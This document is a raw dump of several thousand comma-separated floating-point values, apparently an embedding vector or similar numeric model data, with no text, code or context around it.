0.017306528985500336, -0.015309073030948639, -0.043087977916002274, 0.004069816321134567, -0.0017477739602327347, 0.01605098508298397, 0.0291913915425539, 0.010993141680955887, 0.030332794412970543, -0.009937343187630177, -0.013240279629826546, 0.010365369729697704, -0.008938615210354328, 0.0047225565649569035, -0.003848669584840536, 0.013218877837061882, -0.0051291813142597675, -0.03136005625128746, 0.010786262340843678, 0.0045370785519480705, -0.011970467865467072, -0.0014642064925283194, 0.010593649931252003, 0.013033400289714336, -0.01976054534316063, -0.010508044622838497, 0.01568002812564373, 0.013226011767983437, 0.01973201148211956, -0.000977326650172472, -0.006031603552401066, 0.006448929198086262, 0.0185620728880167, -0.017763089388608932, 0.010993141680955887, -0.018533537164330482, -0.003135292325168848, -0.007840014062821865, -0.02285660244524479, 0.00331363664008677, 0.017663218080997467, -0.009973011910915375, -0.00017076464428100735, -0.009045621380209923, -0.03703853860497475, 0.0026787309907376766, -0.0005644596531055868, -0.002313125180080533, -0.012220149859786034, -0.008924347348511219, 0.0029480308294296265, 0.0005323576624505222, -0.00010527885751798749, -0.009651992470026016, 0.020588062703609467, -0.012369959615170956, -0.0021686663385480642, 0.013411489315330982, -0.006074406206607819, -0.001829812303185463, -0.004747524857521057, -0.02210042253136635, 0.02013150230050087, 0.006184979807585478, 0.010700657032430172, -0.000487325742142275, 0.011378364637494087, -0.013604101724922657, 0.0016050984850153327, 0.020374050363898277, -0.03427063673734665, 0.004611982963979244, 0.032016366720199585, -0.01645047590136528, -0.03267267346382141, -0.020217107608914375, 0.009124093689024448, 0.00782574713230133, 0.035297900438308716, -0.00988740660250187, -0.004868798889219761, 0.0025699411053210497, 0.009166896343231201, -0.01977481320500374, -0.002313125180080533, -0.0030051011126488447, -0.006070839241147041, 0.011107281781733036, 0.025082338601350784, -0.01627926528453827, 0.01007288508117199, 0.006277718581259251, 0.025068072602152824, 0.012826520949602127, 0.002247137948870659, 0.020802076905965805, -0.04360160976648331, 0.010037216357886791, 0.03461305797100067, 0.017962835729122162, 0.030247189104557037, -0.014260408468544483, -0.006709311623126268, 0.02013150230050087, 0.012512634508311749, -0.027764637023210526, 0.004779626615345478, -0.012127410620450974, -0.01605098508298397, 0.0018280288204550743, 0.008004091680049896, -0.01626499742269516, 0.011221421882510185, 0.0026002596132457256, 0.004979372024536133, -0.00822523795068264, -0.00833224505186081, 0.016750095412135124, -0.005061410833150148, -0.021615326404571533, 0.0013135055778548121, -0.003488413989543915, -0.010301165282726288, 0.006384725216776133, -0.00793988723307848, -0.0013045883970335126, 0.007440523244440556, 0.001242167898453772, 0.014952383935451508, -0.0018458632985129952, 0.021044624969363213, -0.01499518658965826, -0.005735551938414574, 0.02282806672155857, 0.021729467436671257, -0.004504976328462362, 0.0008141416474245489, -0.013454291969537735, 0.03001890890300274, 0.010800529271364212, 0.015751367434859276, -0.004843830596655607, -0.009644858539104462, 0.02398373931646347, 0.02128717303276062, 0.013040533289313316, -0.009630590677261353, -0.002819623099640012, -0.0026805144734680653, 0.0053110928274691105, 0.022371506318449974, -0.0021419147960841656, -0.010208426043391228, -0.017905766144394875, 0.018704747781157494, 0.015822704881429672, 0.019617870450019836, 0.02478272095322609, 0.021772269159555435, -0.02145838364958763, -0.027821706607937813, -0.014017860405147076, -0.006466763559728861, -0.013868050649762154, -0.008417850360274315, -0.003331471234560013, 0.006951860152184963, 0.019089970737695694, -0.004515677224844694, -0.000832421937957406, 0.0008136957767419517, 0.00686268787831068, 0.021586790680885315, 0.016693023964762688, -0.0271083302795887, 0.01914704218506813, 0.028392409905791283, 0.009181163273751736, -0.008874411694705486, -0.0014338879846036434, 0.01817684806883335, -0.004929435905069113, -0.008196703158318996, -0.013675439171493053, -0.01704971306025982, -0.032587066292762756, -0.00575695326551795, 0.008517722599208355, -0.006452496163547039, 0.004048414994031191, 0.004583448171615601, -0.0017397484043613076, 0.020374050363898277, 0.024269089102745056, -0.014809709042310715, -0.013825248926877975, -0.008638996630907059, 0.01956080086529255, -0.0025128708221018314, -0.015037989243865013, 0.009723329916596413, -0.010572249069809914, -0.004251727368682623, -0.0074690585024654865, -0.0057498193345963955, 0.006117208860814571, -0.008118231780827045, 0.018790353089571, -0.008439251221716404, -0.002735801273956895, -0.0036845928989350796, -0.01568002812564373, -0.023170487955212593, -0.02959088236093521, 0.016593150794506073, 0.04314504936337471, 0.003199496306478977, 0.0025414060801267624, 0.011185753159224987, 0.013825248926877975, -0.004076950252056122, 0.0005787271657027304, -0.04388695955276489, 0.016507545486092567, 0.02766476385295391, -0.02305634878575802, -0.001710321637801826, 0.017306528985500336, 0.011221421882510185, 0.008403582498431206, 0.01666449010372162, 0.010936071164906025, -0.006374024320393801, -0.015166397206485271, 0.0015310855815187097, 0.0013777095591649413, -0.02399800531566143, 0.014103465713560581, 0.02590985596179962, -0.019289717078208923, -0.0017468822188675404, -0.002022424014285207, -0.01680716499686241, -0.02014577016234398, 0.0012412761570885777, -0.006613005883991718, -0.005336060654371977, 0.01064358651638031, 0.004943703301250935, 0.003934274893254042, 0.014581427909433842, -0.011899130418896675, -0.014274676330387592, 0.01603671722114086, -0.011014542542397976, 0.009345239959657192, 0.01854780502617359, -0.0004200007824692875, 0.005731984972953796, 0.012648176401853561, -0.00706956721842289, 0.014039261266589165, 0.000005775289537268691, -0.033585794270038605, -0.006891223136335611, -0.01762041449546814, -0.0016434425488114357, 0.011877728626132011, 0.006156444549560547, -0.0006072622491046786, -0.010579383000731468, 0.014560027047991753, 0.005785488523542881, -0.0025164377875626087, 0.006630840245634317, -0.019389590248465538, -0.0006728037842549384, -0.008196703158318996, 0.002275672974064946, 0.003891472239047289, -0.006684343330562115, 0.01839086227118969, 0.002001022920012474, -0.01169938500970602, -0.0009363074786961079, 0.0014668817166239023, 0.014574293978512287, -0.005478736013174057, -0.008803073316812515, -0.003777331905439496, -0.0058247242122888565, 0.006277718581259251, 0.00297299912199378, -0.030932031571865082, -0.012833653949201107, -0.011071613058447838, -0.017063980922102928, -0.0042552943341434, -0.00014791428111493587, 0.010229827836155891, 0.006488164886832237, -0.021001821383833885, 0.0072586121968925, -0.0020830612629652023, 0.010622185654938221, 0.013568433001637459, -0.009252500720322132, -0.014852511696517467, -0.0104367071762681, -0.002776820445433259, 0.0378945916891098, -0.014838243834674358, 0.018647678196430206, -0.005432366859167814, -0.009231099858880043, -0.004216058645397425, -0.01931825280189514, 0.017135318368673325, -0.008139632642269135, -0.004362300969660282, -0.0037095609586685896, -0.005040009506046772, -0.00686268787831068, -0.0191755760461092, -0.013882318511605263, -0.02224309928715229, 0.0023844630923122168, 0.0023577113170176744, 0.0004382810730021447, -0.0068020508624613285, -0.026765909045934677, 0.003176311496645212, -0.014966651797294617, 0.007640269119292498, -0.00024388580641243607, -0.003151343436911702, -0.00910982582718134, -0.0037452299147844315, -0.007461924571543932, 0.01353276427835226, 0.0040626828558743, -0.016507545486092567, -0.004979372024536133, 0.017962835729122162, -0.015394678339362144, 0.0022203861735761166, 0.021187299862504005, -0.025410491973161697, -0.010115687735378742, -0.01976054534316063, -0.0013250979827716947, -0.01102167647331953, 0.011870595626533031, -0.006691477261483669, 0.014224739745259285, 0.021629594266414642, -0.0170211773365736, -0.009552119299769402, 0.015737099573016167, 0.002919495804235339, 0.00450854329392314, -0.004594148602336645, 0.0034723631106317043, -0.001316180801950395, -0.002552106510847807, -0.008396448567509651, -0.02807852253317833, 0.005207653157413006, 0.012241551652550697, 0.0035008981358259916, 0.00813249871134758, 0.026979923248291016, -0.011249956674873829, -0.016578884795308113, -0.008103963918983936, 0.010465241968631744, -0.014766906388103962, -0.003008668078109622, 0.008075429126620293, 0.006555935833603144, -0.021943479776382446, -0.012912125326693058, -0.00032258022110909224, 0.002099112141877413, -0.01441021729260683, -0.008153900504112244, -0.006966127548366785, 0.023555712774395943, 0.0006175170419737697, -0.016222195699810982, 0.022913672029972076, -0.0005203194450587034, 0.012448430992662907, -0.00852485653012991, -0.003616821952164173, 0.003643573494628072, 0.024640046060085297, 0.004166122525930405, 0.002216819440945983, -0.0012171997223049402, 0.020060164853930473, -0.023298896849155426, 0.012255818583071232, 0.01603671722114086, 0.0005533131188713014, 0.010679255239665508, -0.01743493601679802, -0.001931468490511179, 0.010201293043792248, -0.012605373747646809, -0.0030853559728711843, -0.009823203086853027, -0.02615240588784218, -0.013775312341749668, -0.013825248926877975, 0.02455444075167179, -0.010500910691916943, 0.027222471311688423, 0.00044095623889006674, 0.0070838346146047115, -0.001155670965090394, 0.00044675241224467754, -0.00996587797999382, 0.013218877837061882, -0.009794667363166809, -0.0314171276986599, -0.024525905027985573, 0.020445387810468674, -0.006998229306191206, 0.0029783493373543024, -0.020588062703609467, -0.001761149731464684, 0.035297900438308716, -0.007340650539845228, -0.008111097849905491, -0.012270086444914341, -0.01777735725045204, -0.002896310994401574, -0.027365146204829216, 0.009423711337149143, -0.024497369304299355, 0.031046172603964806, -0.005189818330109119, 0.010814797133207321, -0.0006447145715355873, 0.00658090366050601, 0.016136590391397476, 0.009231099858880043, 0.030874961987137794, -0.010615051724016666, -0.01645047590136528, 0.0006839503184892237, 0.003593637142330408, 0.028149861842393875, -0.021401314064860344, -0.014552893117070198, 0.00988740660250187, 0.0007196191581897438, 0.008753136731684208, -0.001931468490511179, -0.007076701149344444, 0.03715268149971962, -0.008724601939320564, -0.006488164886832237, -0.0011414033360779285, -0.017748823389410973, 0.028734829276800156, 0.0019814048428088427, -0.005496570840477943, -0.012676711194217205, -0.022014817222952843, -0.033157769590616226, -0.007747275289148092, -0.01169938500970602, -0.007740141823887825, -0.01326881442219019, -0.0065702032297849655, -0.006374024320393801, -0.007019630633294582, 0.018719015643000603, 0.010065751150250435, -0.041718292981386185, -0.011927665211260319, 0.008753136731684208, -0.021130230277776718, 0.004116185940802097, -0.01190626434981823, -0.02516794390976429, -0.005878227297216654, 0.0011966901365667582, -0.002776820445433259, -0.010679255239665508, -0.03193075954914093, -0.015822704881429672, -0.004476441536098719, 0.0125911058858037, 0.007044598925858736, 0.0025966926477849483, -0.008738869801163673, -0.008189569227397442, 0.011356963776051998, 0.005917462985962629, 0.03247292712330818, 0.006951860152184963, -0.00484026363119483, 0.02108742669224739, -0.01700690947473049, -0.012412761338055134, -0.006873388309031725, 0.009402310475707054, -0.0067200125195086, 0.0071623059920966625, 0.004672619979828596, -0.009024220518767834, 0.010401038452982903, 0.011428301222622395, 0.023912400007247925, 0.014181937091052532, 0.03307216241955757, -0.010393904522061348, 0.0005225487402640283, -0.012769450433552265, 0.0034723631106317043, 0.00860332790762186, -0.03233025223016739, -0.00937377568334341, 0.00793988723307848, 0.029476743191480637, -0.023127686232328415, 0.0055643413215875626, 0.020745007321238518, -0.000027253234293311834, 0.001400002627633512, 0.009937343187630177, -0.004986505955457687, -0.0069090574979782104, 0.00469758827239275, 0.005589309614151716, -0.00015415633970405906, 0.015466015785932541, -0.0069090574979782104, -0.01680716499686241, -0.0069875288754701614, 0.02188641019165516, 0.012220149859786034, -0.014224739745259285, 0.010679255239665508, 0.01609378680586815, 0.003930707927793264, -0.00019640164100565016, 0.0032619168050587177, 0.015637226402759552, -0.008831609040498734, -0.01880462095141411, -0.00036738920607604086, 0.018847422674298286, -0.016293533146381378, -0.005353895016014576, -0.03001890890300274, 0.00038789879181422293, 0.007711606565862894, 0.00537886330857873, -0.011877728626132011, 0.006431094836443663, -0.033956751227378845, -0.00629555294290185, -0.016992643475532532, 0.010108553804457188, 0.018048441037535667, 0.02090195007622242, 0.005018608178943396, -0.011999002657830715, -0.012127410620450974, 0.005828291177749634, -0.0009425494936294854, 0.0024165650829672813, 0.01700690947473049, -0.0017513408092781901, -0.01817684806883335, -0.010771994479000568, -0.009730463847517967, 0.041347336024045944, -0.0025770748034119606, -0.004230326507240534, 0.007197975181043148, 0.0071123698726296425, -0.01816258206963539, 0.008146766573190689, -0.020245643332600594, -0.0025253549683839083, 0.000384331913664937, -0.0018057358684018254, 0.0009782183915376663, -0.016536081209778786, 0.025824250653386116, -0.005764087196439505, -0.01913277432322502, -0.0021044625900685787, 0.007041031960397959, 0.0030817892402410507, 0.006345489528030157, 0.003456312231719494, -0.004936569835990667, -0.016693023964762688, 0.0337284691631794, -0.0012252251617610455, -0.02319902367889881, 0.0006246508564800024, 0.030932031571865082, -0.015722831711173058, 0.005450201220810413, -0.02164386212825775, -0.015637226402759552, -0.010957472026348114, -0.005789055489003658, 0.021244371309876442, 0.00791848637163639, 0.004034147597849369, 0.0018779652891680598, -0.005114913918077946, -0.02224309928715229, -0.0038272682577371597, -0.014110599644482136, 0.00022237302619032562, -0.009823203086853027, 0.013768178410828114, -0.03324337303638458, -0.008917214348912239, -0.0000576832280785311, 0.009209698997437954, -0.022942207753658295, -0.012612507678568363, 0.033186301589012146, -0.0035954206250607967, -0.011521040461957455, -0.001058473251760006, -0.009430845268070698, -0.026023996993899345, -0.009908808395266533, 0.011150084435939789, 0.004116185940802097, 0.008424983359873295, -0.009844603948295116, 0.01228435430675745, -0.0029355469159781933, -0.011749320663511753, -0.003966376651078463, -0.0189472958445549, -0.00871746800839901, 0.014117732644081116, -0.008389314636588097, 0.004854531027376652, -0.012555437162518501, 0.01459569577127695, 0.001702296081930399, -0.03021865524351597, 0.006113641895353794, 0.010964605957269669, 0.00026640176656655967, 0.01646474376320839, -0.003609688254073262, 0.006420393940061331, 0.005418098997324705, 0.0007107019773684442, 0.01316180732101202, -0.02281380072236061, -0.006812751293182373, -0.01034396793693304, -0.00411261897534132, 0.019104238599538803, -0.0024094311520457268, -0.022000549361109734, -0.009709062054753304, -0.013104737736284733, -0.000819491979200393, -0.023184755817055702, -0.014738371595740318, 0.006841286551207304, -0.004804594907909632, 0.00012528685329016298, -0.01683570072054863, -0.00420535821467638, -0.002944464096799493, 0.02070220373570919, 0.0008034409838728607, 0.002072360599413514, -0.008054027333855629, -0.020559528842568398, 0.004273128695785999, 0.014032128266990185, 0.014588561840355396, 0.012890724465250969, 0.010978873819112778, -0.013525630347430706, -0.0068020508624613285, -0.022400042042136192, 0.013639770448207855, -0.009830337017774582, -0.017706019803881645, 0.04194657504558563, 0.010322567075490952, 0.003955676220357418, -0.00006582018249901012, 0.009623457677662373, -0.0013063718797639012, -0.0021008956246078014, 0.004326632246375084, 0.009195431135594845, -0.00317096128128469, -0.008075429126620293, -0.013126138597726822, 0.02590985596179962, 0.02168666385114193, -0.023898134008049965, -0.0021597491577267647, -0.015351875685155392, 0.0352693647146225, 0.018076976761221886, -0.017106782644987106, 0.012419895268976688, 0.00542523292824626, 0.006934025324881077, -0.02127290517091751, -0.015351875685155392, -0.0036203889176249504, -0.020188571885228157, 0.006944726221263409, 0.0035740192979574203, -0.0014196204720064998, 0.004608415998518467, 0.018433663994073868, -0.019104238599538803, 0.021558256819844246, 0.015337607823312283, -0.045399319380521774, -0.02903444878757, 0.012940661050379276, -0.00312459166161716, -0.023669851943850517, 0.017292261123657227, -0.017648950219154358, 0.004059115890413523, 0.031845156103372574, 0.0029783493373543024, 0.0037630642764270306, -0.009901674464344978, 0.008967150002717972, -0.02068793587386608, -0.0073905871249735355, 0.001120002125389874, -0.00009324061829829589, 0.0031317255925387144, -0.001740640145726502, 0.002295290818437934, 0.007868549786508083, 0.005817590281367302, -0.006588037591427565, -0.007037465460598469, -0.0267231073230505, -0.015309073030948639, 0.023698387667536736, 0.025595970451831818, -0.013411489315330982, -0.01402499433606863, 0.010622185654938221, 0.0077330078929662704, 0.01626499742269516, 0.020673668012022972, 0.012434163130819798, 0.009694795124232769, -0.020259909331798553, 0.01266957726329565, 0.009530718438327312, -0.007226509973406792, -0.007868549786508083, 0.01207747496664524, 0.006074406206607819, 0.01977481320500374, -0.017377866432070732, -0.027707567438483238, 0.006884089205414057, -0.019846150651574135, -0.013903720304369926, 0.0069875288754701614, -0.029505277052521706, 0.0023737624287605286, -0.006944726221263409, 0.0059816669672727585, -0.021344242617487907, 0.01276231650263071, -0.0008056702790781856, 0.017720287665724754, 0.014174803160130978, 0.005735551938414574, 0.0014775823801755905, -0.0010406388901174068, -0.011706518009305, -0.0055928765796124935, -0.023313164710998535, -0.016550349071621895, 0.0007289822096936405, 0.02381252869963646, 0.020359782502055168, -0.010921803303062916, -0.0010174540802836418, -0.0024094311520457268, 0.010607917793095112, 0.01609378680586815, 0.003438477637246251, -0.007055299822241068, -0.005728418007493019, 0.004030580632388592, 0.00937377568334341, -0.018062708899378777, -0.029904767870903015, -0.012419895268976688, -0.011492505669593811, 0.023655585944652557, -0.001689812052063644, 0.016193659976124763, 0.012127410620450974, -0.0029230627696961164, 0.027721835300326347, -0.014738371595740318, -0.011521040461957455, -0.013782446272671223, -0.0007949696155264974, -0.003026502439752221, -0.011927665211260319, -0.0003680580120999366, 0.008753136731684208, -0.00956638716161251, -0.0023808961268514395, -0.0017245891503989697, -0.016735827550292015, -0.008111097849905491, 0.0071409051306545734, -0.0031014070846140385, -0.0012412761570885777, -0.007790077943354845, 0.02401227317750454, 0.02051672525703907, 0.010886134579777718, 0.001021021045744419, -0.006345489528030157, -0.007697339169681072, 0.018719015643000603, -0.013090469874441624, 0.006452496163547039, -0.014667033217847347, -0.02650909312069416, 0.02105889283120632, 0.015408945269882679, 0.016978375613689423, -0.008168168365955353, -0.013111871667206287, -0.004480008501559496, -0.0069268918596208096, 0.010008680634200573, 0.01007288508117199, 0.015351875685155392, -0.0003551280533429235, 0.009630590677261353, -0.002894527744501829, 0.004950837232172489, -0.011949067004024982, 0.0162507314234972, 0.012933527119457722, -0.005057843867689371, -0.027935847640037537, 0.0043052309192717075, 0.01190626434981823, 0.011585243977606297, 0.0008605111506767571, -0.024511637166142464, 0.010993141680955887, 0.0010290464852005243, -0.028877506032586098, -0.004390836227685213, -0.012733781710267067, -0.006527400575578213, -0.020259909331798553, -0.018647678196430206, -0.011064479127526283, 0.0012377093080431223, 0.03615395352244377, 0.026052532717585564, -0.0125911058858037, 0.02222883142530918, -0.010051483288407326, 0.004422937985509634, 0.012391360476613045, 0.015993915498256683, 0.004975805524736643, 0.01181352511048317, -0.024126414209604263, -0.014067796990275383, -0.008153900504112244, -0.021943479776382446, 0.014153402298688889, 0.02090195007622242, -0.01025122869759798, -0.011463969945907593, -0.004126886371523142, -0.010080019012093544, -0.014032128266990185, -0.00801835861057043, -0.009259634651243687, 0.00044608363532461226, 0.0012323589762672782, 0.0053110928274691105, -0.0040626828558743, -0.02247137948870659, 0.01172078587114811, -0.018233919516205788, 0.0026270111557096243, -0.013318751007318497, -0.02747928723692894, 0.012013270519673824, -0.0033386049326509237, -0.008860143832862377, 0.011371231637895107, -0.015123594552278519, -0.01055084727704525, 0.0019707041792571545, 0.0016835699789226055, -0.031245917081832886, -0.001730831223540008, -0.010907536372542381, -0.00871033500880003, 0.012847921811044216, -0.015722831711173058, 0.006077973172068596, -0.026409219950437546, -0.00890294648706913, -0.02399800531566143, -0.026238009333610535, -0.00584969250485301, -0.015765633434057236, -0.013825248926877975, -0.016992643475532532, 0.010857599787414074, 0.010672121308743954, -0.006538101471960545, -0.008531990461051464, -0.022171759977936745, -0.0022364372853189707, 0.003488413989543915, -0.009067023172974586, 0.004822429269552231, 0.003540133824571967, 0.023869598284363747, 0.002425482263788581, 0.014602829702198505, 0.010222693905234337, 0.005321793258190155, 0.011542441323399544, 0.006370457820594311, -0.002204335294663906, -0.009509316645562649, -0.005728418007493019, 0.006894789636135101, -0.018875958397984505, -0.0026555464137345552, -0.0005849692388437688, -0.013753910548985004, -0.000010714589734561741, -0.015137862414121628, 0.009794667363166809, 0.00038923637475818396, 0.01800563745200634, 0.012605373747646809, -0.006645107641816139, -0.017891498282551765, -0.003165610833093524, -0.022599786520004272, -0.010222693905234337, -0.0017361815553158522, -0.0003125483344774693, -0.00968052726238966, -0.005303958896547556, 0.001918984460644424, -0.012056073173880577, -0.009416578337550163, 0.018519269302487373, 0.005082812160253525, 0.001096817315556109, -0.00721224257722497, -0.00023675203556194901, 0.03641076758503914, 0.002455800771713257, 0.0009318488300777972, 0.005068544298410416, -0.025496097281575203, 0.011078746989369392, 0.00358293647877872, 0.021258637309074402, 0.014524358324706554, 0.005503704305738211, -0.009045621380209923, 0.0033118531573563814, -0.0021668830886483192, 0.034127961844205856, -0.003795166267082095, 0.001140511711128056, 0.01566576212644577, -0.010964605957269669, 0.01268384512513876, -0.005368162877857685, -0.013033400289714336, 0.029105786234140396, -0.01570856384932995, 0.015779901295900345, 0.01570856384932995, -0.0029301964677870274, 0.00662727328017354, -0.00643822830170393, -0.018076976761221886, 0.0014802574878558517, -0.0052825575694441795, -0.010786262340843678, 0.021372778341174126, 0.007369185797870159, -0.02496819943189621, -0.002894527744501829, 0.013147540390491486, 0.02359851449728012, -0.026837246492505074, 0.008681799285113811, 0.010351101867854595, -0.006859120912849903, -0.013425757177174091, -0.020673668012022972, -0.011635180562734604, 0.008474919945001602, -0.01315467432141304, 0.015951111912727356, 0.021786537021398544, 0.002234653802588582, -0.011264224536716938, -0.005007907282561064, -0.010329701006412506, 0.016350602731108665, 0.004686887841671705, 0.0267231073230505, 0.017178120091557503, 0.0005096187815070152, 0.01759187877178192, 0.013868050649762154, 0.0026305781211704016, -0.012890724465250969, -0.023156221956014633, 0.012626774609088898, 0.017862962558865547, -0.006819885224103928, -0.022927939891815186, -0.0015926144551485777, -0.008482053875923157, 0.02167239598929882, -0.011899130418896675, -0.029062984511256218, -0.0034937644377350807, -0.017163854092359543, -0.01162091363221407, -0.007968422025442123, 0.00532892718911171, 0.011727919802069664, 0.014296077191829681, 0.00901708658784628, 0.013768178410828114, -0.02886323817074299, 0.016108054667711258, 0.02706552855670452, 0.022114690393209457, 0.0025414060801267624, -0.014752638526260853, 0.017948567867279053, 0.007725873962044716, 0.006277718581259251, 0.015052257105708122, 0.006798483897000551, -0.022514181211590767, -0.011970467865467072, -0.009295303374528885, 0.0056214118376374245, 0.016992643475532532, 0.016536081209778786, 0.008531990461051464, 0.006327655166387558, 0.00415898859500885, 0.009537852369248867, 0.013119004666805267, 0.013290215283632278, -0.003258350072428584, -0.04491422325372696, -0.0019207678269594908, -0.0027750369627028704, -0.011492505669593811, -0.009751864708960056, -0.011463969945907593, -0.005482302978634834, 0.015252002514898777, 0.027992917224764824, 0.007504727225750685, 0.0013197476509958506, -0.0018369461176916957, 0.009901674464344978, 0.00022828068176750094, 0.008753136731684208, 0.0023149086628109217, -0.00977326650172472, 0.005403831601142883, 0.009559253230690956, -0.009495049715042114, -0.004808161873370409, 0.00998014584183693, -0.012648176401853561, 0.0032637002877891064, 0.011442569084465504, -0.0008293009013868868, 0.006099374499171972, -0.001704971306025982, 0.016978375613689423, -0.007889950647950172, -0.015223467722535133, -0.007982689887285233, 0.006234915927052498, -0.0019350354559719563, 0.02013150230050087, -0.014074930921196938, 0.0012814035871997476, -0.0037166946567595005, -0.0038308349903672934, 0.00014512766210827976, -0.013354419730603695, -0.007222943473607302, 0.03264413774013519, -0.0025949091650545597, 0.014952383935451508, -0.0083179771900177, 0.015565888956189156, -0.012063207104802132, 0.0017201305599883199, -0.0006420394056476653, 0.01837659440934658, 0.03198783099651337, 0.011742187663912773, 0.0014187287306413054, -0.02823546528816223, 0.008974283933639526, 0.0010424222564324737, 0.0029301964677870274, 0.006220648530870676, 0.011834925971925259, -0.012056073173880577, -0.007861415855586529, 0.0023612782824784517, -0.004808161873370409, 0.04397256672382355, 0.010879000648856163, 0.020488191395998, 0.030846426263451576, -0.0062135145999491215, -0.02111596241593361, 0.025011001154780388, -0.01103594433516264, 0.04183243215084076, 0.02575291320681572, -0.01102167647331953, 0.011970467865467072, -0.006588037591427565, -0.007426255848258734, 0.006420393940061331, 0.013789579272270203, 0.005678481888025999, 0.018505001440644264, -0.0002871342876460403, -0.004708289168775082, 0.00871033500880003, -0.014838243834674358, 0.0028980944771319628, 0.0006001284928061068, 0.012519768439233303, -0.008467786014080048, -0.015908310189843178, 0.016293533146381378, -0.03292948752641678, -0.00575695326551795, -0.004212491679936647, -0.015366142615675926, -0.008974283933639526, -0.03255853056907654, 0.009880272671580315, -0.00137949304189533, -0.002871342934668064, 0.004365867935121059, 0.006655808538198471, 0.005143449176102877, -0.002919495804235339, -0.019617870450019836, 0.016307801008224487, -0.021986283361911774, -0.002355927834287286, -0.008268040604889393, 0.004726123530417681, 0.012612507678568363, -0.002962298458442092, 0.012362825684249401, 0.015351875685155392, 0.005086378660053015, -0.034327708184719086, 0.0019796215929090977, -0.015252002514898777, -0.012262952513992786, 0.0039770775474607944, -0.02571011148393154, -0.01034396793693304, 0.016792897135019302, -0.014460153877735138, -0.0010656070662662387, -0.009894540533423424, -0.0018779652891680598, 0.014652766287326813, 0.0018075192347168922, 0.01103594433516264, 0.01198473572731018, 0.00594599824398756, -0.001965353963896632, -0.02088768221437931, 0.007255045231431723, 0.00697682797908783, -0.008653264492750168, 0.014110599644482136, -0.015052257105708122, -0.01854780502617359, 0.0025235714856535196, -0.002211468992754817, -0.01860487461090088, -0.0038165675941854715, 0.014074930921196938, 0.022328704595565796, -0.01472410373389721, 0.0014552893117070198, 0.010244095697999, 0.003409942612051964, -0.011071613058447838, 0.003987777978181839, -0.008275174535810947, -0.009181163273751736, -0.00784714799374342, -0.031103242188692093, 0.004212491679936647, -0.017377866432070732, 0.009915942326188087, 0.04009179398417473, -0.0027251006104052067, -0.0016755445394665003, 0.013910853303968906, 0.021615326404571533, -0.0009808934992179275, -0.014324611984193325, -0.01762041449546814, 0.011635180562734604, 0.00044898170745000243, -0.0007958613568916917, 0.0008493646164424717, 0.013682573102414608, 0.014866778627038002, 0.011185753159224987, -0.008367913775146008, 0.01295492798089981, -0.024711383506655693, -0.013040533289313316, 0.020488191395998, -0.022200295701622963, 0.005988800898194313, 0.014274676330387592, -0.0031192414462566376, 0.010372503660619259, -0.006527400575578213, -0.015337607823312283, 0.021144498139619827, -0.012419895268976688, 0.003076438792049885, -0.0012635692255571485, -0.015908310189843178, -0.009787534363567829, 0.015551621094346046, -0.022770997136831284, -0.014203337952494621, 0.02170093171298504, -0.0063383555971086025, -0.013475693762302399, 0.002789304591715336, -0.0017174554523080587, -0.01627926528453827, -0.00512561434879899, 0.014923849143087864, 0.02378399297595024, 0.00871746800839901, 0.01472410373389721, 0.011877728626132011, -0.013297349214553833, -0.008517722599208355, -0.008988551795482635, -0.0040270136669278145, -0.02147265151143074, 0.0006852878723293543, 0.01820538379251957, -0.008203837089240551, -0.012648176401853561, 0.021201567724347115, -0.010386770591139793, 0.0023808961268514395, -0.001820003380998969, -0.010401038452982903, -0.003508032066747546, -0.01296919584274292, 0.008724601939320564, 0.014781174249947071, -0.0077972118742764, 0.021030357107520103, -0.014438753016293049, 0.021715199574828148, 0.014809709042310715, -0.015951111912727356, -0.0008168168133124709, -0.024668579921126366, 0.0038308349903672934, -0.022014817222952843, -0.0076545365154743195, -0.014624230563640594, -0.015223467722535133, -0.023955203592777252, -0.00888867862522602, 0.0035722358152270317, -0.01874755136668682, -0.0065987384878098965, -0.0078114792704582214, 0.025267817080020905, -0.01836232654750347, -0.003636439796537161, 0.017663218080997467, 0.013639770448207855, -0.006316954270005226, 0.0044621736742556095, 0.002008156618103385, 0.0006491731619462371, 0.018647678196430206, 0.013611235655844212, -0.004276695661246777, -0.012598239816725254, 0.008631862699985504, -0.004019880201667547, -0.009452247060835361, 0.0021062458399683237, 0.0004019434272777289, -0.006901923567056656, 0.0038165675941854715, 0.0008190461085177958, 0.01005861721932888, 0.01094320509582758, 0.0164790116250515, 0.009266768582165241, 0.00484026363119483, -0.018519269302487373, 0.008439251221716404, -0.018433663994073868, 0.016179392114281654, -0.007989823818206787, 0.007383453194051981, -0.02822119928896427, 0.0028214065823704004, -0.010793395340442657, 0.02961941808462143, 0.03846529498696327, -0.0014998753322288394, 0.01249123364686966, 0.0147098358720541, 0.00888867862522602, 0.0002082169521600008, -0.027165399864315987, 0.01256970502436161, 0.008439251221716404, 0.010158490389585495, 0.002186500933021307, -0.003174528246745467, -0.006020902656018734, 0.005917462985962629, 0.010636452585458755, -0.008367913775146008, 0.02285660244524479, 0.0044586071744561195, 0.0033867578022181988, 0.015266270376741886, -0.0021490484941750765, -0.009309571236371994, 0.01779162511229515, 0.0006812751526013017, -0.016593150794506073, 0.0005011474131606519, -0.009338106028735638, 0.005846125539392233, -0.00977326650172472, -0.0006456063129007816, 0.012541169300675392, -0.002270322758704424, 0.034384775906801224, 0.0025253549683839083, 0.010686389170587063, -0.016150858253240585, 0.021130230277776718, -0.003038986586034298, -0.023313164710998535, -0.005086378660053015, -0.0009282819810323417, -0.013910853303968906, 0.016693023964762688, 0.012919259257614613, 0.022770997136831284, -0.032244645059108734, 0.002382679609581828, 0.02883470244705677, 0.010793395340442657, 0.00624561682343483, 0.005175550933927298, 0.004497842863202095, 0.005742685869336128, 0.012576838955283165, -0.005682048853486776, 0.00910982582718134, -0.013789579272270203, -0.00013531872536987066, 0.015237735584378242, 0.030247189104557037, 0.009901674464344978, -0.0037024272605776787, 0.0023933802731335163, 0.007262179162353277, 0.003219114150851965, -0.014510090462863445, 0.007312115281820297, 0.010429573245346546, -0.023926667869091034, 0.0008489187457598746, 0.00026439540670253336, -0.006160011515021324, 0.014117732644081116, -0.015908310189843178, 0.007633135188370943, 0.018447931855916977, -0.011164352297782898, 0.026166671887040138, 0.010087152011692524, -0.011242823675274849, -0.02633788250386715, -0.002532488666474819, -0.007144471630454063, 0.009145494550466537, 0.012163079343736172, 0.01394652295857668, 0.01518066506832838, -0.00930243730545044, -0.012576838955283165, 0.018861690536141396, -0.009423711337149143, 0.003433127421885729, -0.008610461838543415, -0.013247412629425526, 0.00909555796533823, -0.018918761983513832, -0.003390324767678976, -0.01307620294392109, 0.014153402298688889, -0.035526178777217865, 